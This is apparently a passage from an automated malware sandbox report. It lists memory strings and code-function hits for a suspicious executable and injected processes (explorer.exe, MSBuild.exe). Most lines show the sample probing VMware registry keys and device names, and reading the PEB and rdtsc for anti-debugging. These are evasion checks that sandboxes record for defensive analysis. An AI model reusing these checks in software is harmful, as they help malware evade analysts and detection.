          Source: explorer.exe, 0000001E.00000003.569973549.000000000D998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
          Source: explorer.exe, 0000001E.00000003.570376867.000000000AC45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}UU}h@
          Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000001-5
          Source: explorer.exe, 0000001E.00000002.604249591.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
          Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bgo<L
          Source: explorer.exe, 0000001E.00000003.565231882.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAL
          Source: explorer.exe, 0000001E.00000003.567907070.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
          Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001
          Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000003.565863897.000000000D815000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00E
          Source: explorer.exe, 0000000F.00000000.386228381.0000000008B4E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}0O
          Source: explorer.exe, 0000001E.00000002.612120969.000000000D815000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: explorer.exe, 0000001E.00000003.564612786.000000000AB41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:T
          Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
          Source: explorer.exe, 0000001E.00000003.564612786.000000000AB41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:W
          Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bd
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000001E.00000003.543609262.000000000A9B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000@v
          Source: explorer.exe, 0000000F.00000000.379750748.0000000000F73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATAL
          Source: explorer.exe, 0000001E.00000003.563562422.000000000D815000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZl+M
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000001E.00000000.489397348.0000000000EF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000001E.00000002.612089074.000000000D80B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}QQ}h
          Source: explorer.exe, 0000001E.00000003.592811161.000000000DF93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B>o
          Source: explorer.exe, 0000000F.00000000.386228381.0000000008B4E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 0000000F.00000000.386085770.0000000008ACF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 0000001E.00000003.567907070.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00}E\Mn
          Source: explorer.exe, 0000001E.00000003.564035684.000000000D827000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: explorer.exe, 0000001E.00000003.559151451.000000000A910000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000P
          Source: explorer.exe, 0000000F.00000000.383239790.00000000069DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
          Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000uN%\
          Source: explorer.exe, 0000001E.00000003.548258493.000000000A9FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000001E.00000000.475945374.0000000000F47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000\
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F73884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F10050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F77016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EFB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F1B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F14120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F14120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00F2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_00FB138A mov eax, dword ptr fs:[00000030h]
